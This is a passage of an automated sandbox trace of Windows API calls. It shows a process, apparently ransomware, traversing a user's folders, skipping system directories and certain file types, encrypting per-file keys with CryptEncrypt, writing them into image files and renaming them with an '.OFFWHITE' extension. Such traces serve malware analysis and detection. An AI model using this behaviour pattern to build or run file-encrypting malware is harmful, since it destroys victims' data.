dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0135.239] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0135.239] GetProcessHeap () returned 0x500000 [0135.239] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314a0 [0135.239] GetProcessHeap () returned 0x500000 [0135.239] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314b8 [0135.239] GetProcessHeap () returned 0x500000 [0135.239] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524af0 [0135.239] GetProcessHeap () returned 0x500000 [0135.239] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524bf8 [0135.239] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.239] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.239] SystemFunction036 (in: RandomBuffer=0x5314a0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314a0) returned 1 [0135.239] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.239] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.239] SystemFunction036 (in: RandomBuffer=0x5314b8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314b8) returned 1 [0135.239] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.239] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.239] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524af0*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x524af0*, pdwDataLen=0x295e990*=0x100) returned 1 [0135.240] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.240] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.240] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524bf8*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x524bf8*, pdwDataLen=0x295e98c*=0x100) returned 1 [0135.240] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0135.240] SetLastError (dwErrCode=0x0) [0135.240] WriteFile (in: hFile=0xffffffff, lpBuffer=0x524af0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0135.240] GetLastError () returned 0x6 [0135.240] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0135.240] lstrcmpiW (lpString1="ntuser.ini", lpString2=".") returned 1 [0135.240] lstrcmpiW (lpString1="ntuser.ini", lpString2="..") returned 1 [0135.240] lstrcmpiW (lpString1="ntuser.ini", lpString2="...") returned 1 [0135.240] lstrcmpiW (lpString1="ntuser.ini", lpString2="windows") returned -1 [0135.240] lstrcmpiW (lpString1="ntuser.ini", lpString2="$recycle.bin") returned 1 [0135.240] lstrcmpiW (lpString1="ntuser.ini", lpString2="rsa") returned -1 [0135.241] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntuser.dat") returned 1 [0135.241] lstrcmpiW (lpString1="ntuser.ini", lpString2="programdata") returned -1 [0135.241] lstrcmpiW (lpString1="ntuser.ini", lpString2="appdata") returned 1 [0135.241] lstrcmpiW (lpString1="ntuser.ini", lpString2="program files") returned -1 [0135.241] lstrcmpiW (lpString1="ntuser.ini", lpString2="program files (x86)") returned -1 [0135.241] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.241] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="ntuser.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" [0135.241] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.241] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.241] PathFindExtensionW (pszPath="ntuser.ini") returned=".ini" [0135.241] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0135.241] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0135.241] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0135.241] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0135.241] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0135.241] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0135.241] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0135.241] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0135.241] lstrcmpiW (lpString1="Pictures", lpString2=".") returned 1 [0135.241] lstrcmpiW (lpString1="Pictures", lpString2="..") returned 1 [0135.241] lstrcmpiW (lpString1="Pictures", lpString2="...") returned 1 [0135.241] lstrcmpiW (lpString1="Pictures", lpString2="windows") returned -1 [0135.241] lstrcmpiW (lpString1="Pictures", lpString2="$recycle.bin") returned 1 [0135.241] lstrcmpiW (lpString1="Pictures", lpString2="rsa") returned -1 [0135.241] lstrcmpiW (lpString1="Pictures", lpString2="ntuser.dat") returned 1 [0135.241] lstrcmpiW (lpString1="Pictures", lpString2="programdata") returned -1 [0135.242] lstrcmpiW (lpString1="Pictures", lpString2="appdata") returned 1 [0135.242] lstrcmpiW (lpString1="Pictures", lpString2="program files") returned -1 [0135.242] lstrcmpiW (lpString1="Pictures", lpString2="program files (x86)") returned -1 [0135.242] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.242] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Pictures" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0135.242] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.242] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.242] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0135.242] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName=".", cAlternateFileName="")) returned 0x544610 [0135.244] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0135.244] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="..", cAlternateFileName="")) returned 1 [0135.244] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0135.244] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0135.244] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8b4dae0, ftCreationTime.dwHighDateTime=0x1d5e0a7, ftLastAccessTime.dwLowDateTime=0x2dab52b0, ftLastAccessTime.dwHighDateTime=0x1d5e06c, ftLastWriteTime.dwLowDateTime=0x2dab52b0, ftLastWriteTime.dwHighDateTime=0x1d5e06c, nFileSizeHigh=0x0, nFileSizeLow=0x14442, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="-7GF43Bqd40EkN.png", cAlternateFileName="-7GF43~1.PNG")) returned 1 [0135.244] lstrcmpiW (lpString1="-7GF43Bqd40EkN.png", lpString2=".") returned 1 [0135.244] lstrcmpiW (lpString1="-7GF43Bqd40EkN.png", lpString2="..") returned 1 [0135.244] lstrcmpiW (lpString1="-7GF43Bqd40EkN.png", lpString2="...") returned 1 [0135.244] lstrcmpiW (lpString1="-7GF43Bqd40EkN.png", lpString2="windows") returned -1 [0135.244] lstrcmpiW (lpString1="-7GF43Bqd40EkN.png", lpString2="$recycle.bin") returned 1 [0135.244] lstrcmpiW (lpString1="-7GF43Bqd40EkN.png", lpString2="rsa") returned -1 [0135.244] lstrcmpiW (lpString1="-7GF43Bqd40EkN.png", lpString2="ntuser.dat") returned -1 [0135.244] lstrcmpiW (lpString1="-7GF43Bqd40EkN.png", lpString2="programdata") returned -1 [0135.244] lstrcmpiW (lpString1="-7GF43Bqd40EkN.png", lpString2="appdata") returned -1 [0135.245] lstrcmpiW (lpString1="-7GF43Bqd40EkN.png", lpString2="program files") returned -1 [0135.245] lstrcmpiW (lpString1="-7GF43Bqd40EkN.png", lpString2="program files (x86)") returned -1 [0135.245] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.245] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="-7GF43Bqd40EkN.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-7GF43Bqd40EkN.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-7GF43Bqd40EkN.png" [0135.245] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.245] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.245] PathFindExtensionW (pszPath="-7GF43Bqd40EkN.png") returned=".png" [0135.245] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0135.245] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0135.245] lstrcmpiW (lpString1="-7GF43Bqd40EkN.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.245] GetProcessHeap () returned 0x500000 [0135.245] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531990 [0135.245] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-7GF43Bqd40EkN.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-7gf43bqd40ekn.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.246] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=83010) returned 1 [0135.246] GetProcessHeap () returned 0x500000 [0135.246] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.246] GetProcessHeap () returned 0x500000 [0135.246] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.246] GetProcessHeap () returned 0x500000 [0135.246] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.246] GetProcessHeap () returned 0x500000 [0135.246] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.246] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.246] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.246] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.246] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.246] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.247] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.247] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.247] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.247] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.247] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.247] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.247] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.247] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x14442, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.247] SetLastError (dwErrCode=0x0) [0135.247] WriteFile (in: hFile=0xb0, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.249] GetLastError () returned 0x0 [0135.249] GetLastError () returned 0x0 [0135.249] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x14542, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.249] WriteFile (in: hFile=0xb0, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.250] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x14642, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.250] WriteFile (in: hFile=0xb0, lpBuffer=0x531990*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x531990*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.250] GetProcessHeap () returned 0x500000 [0135.250] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x14442) returned 0x55a7b8 [0135.250] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.250] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x14442, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x14442, lpOverlapped=0x0) returned 1 [0135.256] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.256] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x14442, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x14442, lpOverlapped=0x0) returned 1 [0135.256] GetProcessHeap () returned 0x500000 [0135.256] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.256] CloseHandle (hObject=0xb0) returned 1 [0135.269] GetProcessHeap () returned 0x500000 [0135.269] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.269] GetProcessHeap () returned 0x500000 [0135.269] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.269] GetProcessHeap () returned 0x500000 [0135.269] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.269] GetProcessHeap () returned 0x500000 [0135.269] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.269] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-7GF43Bqd40EkN.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-7GF43Bqd40EkN.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-7GF43Bqd40EkN.png" [0135.269] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-7GF43Bqd40EkN.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-7GF43Bqd40EkN.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-7GF43Bqd40EkN.png.OFFWHITE" [0135.269] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-7GF43Bqd40EkN.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-7gf43bqd40ekn.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-7GF43Bqd40EkN.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-7gf43bqd40ekn.png.offwhite")) returned 1 [0135.270] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cf75040, ftCreationTime.dwHighDateTime=0x1d5e128, ftLastAccessTime.dwLowDateTime=0xb54cca30, ftLastAccessTime.dwHighDateTime=0x1d5e3fc, ftLastWriteTime.dwLowDateTime=0xb54cca30, ftLastWriteTime.dwHighDateTime=0x1d5e3fc, nFileSizeHigh=0x0, nFileSizeLow=0xe181, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="3cuUtRep2N_ha_P Fn9.bmp", cAlternateFileName="3CUUTR~1.BMP")) returned 1 [0135.270] lstrcmpiW (lpString1="3cuUtRep2N_ha_P Fn9.bmp", lpString2=".") returned 1 [0135.270] lstrcmpiW (lpString1="3cuUtRep2N_ha_P Fn9.bmp", lpString2="..") returned 1 [0135.270] lstrcmpiW (lpString1="3cuUtRep2N_ha_P Fn9.bmp", lpString2="...") returned 1 [0135.270] lstrcmpiW (lpString1="3cuUtRep2N_ha_P Fn9.bmp", lpString2="windows") returned -1 [0135.270] lstrcmpiW (lpString1="3cuUtRep2N_ha_P Fn9.bmp", lpString2="$recycle.bin") returned 1 [0135.270] lstrcmpiW (lpString1="3cuUtRep2N_ha_P Fn9.bmp", lpString2="rsa") returned -1 [0135.270] lstrcmpiW (lpString1="3cuUtRep2N_ha_P Fn9.bmp", lpString2="ntuser.dat") returned -1 [0135.271] lstrcmpiW (lpString1="3cuUtRep2N_ha_P Fn9.bmp", lpString2="programdata") returned -1 [0135.271] lstrcmpiW (lpString1="3cuUtRep2N_ha_P Fn9.bmp", lpString2="appdata") returned -1 [0135.271] lstrcmpiW (lpString1="3cuUtRep2N_ha_P Fn9.bmp", lpString2="program files") returned -1 [0135.271] lstrcmpiW (lpString1="3cuUtRep2N_ha_P Fn9.bmp", lpString2="program files (x86)") returned -1 [0135.271] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.271] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="3cuUtRep2N_ha_P Fn9.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3cuUtRep2N_ha_P Fn9.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3cuUtRep2N_ha_P Fn9.bmp" [0135.271] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.271] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.271] PathFindExtensionW (pszPath="3cuUtRep2N_ha_P Fn9.bmp") returned=".bmp" [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0135.271] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0135.271] lstrcmpiW (lpString1="3cuUtRep2N_ha_P Fn9.bmp", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.271] GetProcessHeap () returned 0x500000 [0135.271] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5319a0 [0135.272] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3cuUtRep2N_ha_P Fn9.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3cuutrep2n_ha_p fn9.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.272] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=57729) returned 1 [0135.272] GetProcessHeap () returned 0x500000 [0135.272] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.272] GetProcessHeap () returned 0x500000 [0135.272] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.272] GetProcessHeap () returned 0x500000 [0135.272] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.272] GetProcessHeap () returned 0x500000 [0135.272] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.272] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.272] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.272] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.272] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.272] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.273] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.273] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.273] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.273] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.273] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.273] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.273] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.273] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xe181, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.273] SetLastError (dwErrCode=0x0) [0135.273] WriteFile (in: hFile=0xb0, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.276] GetLastError () returned 0x0 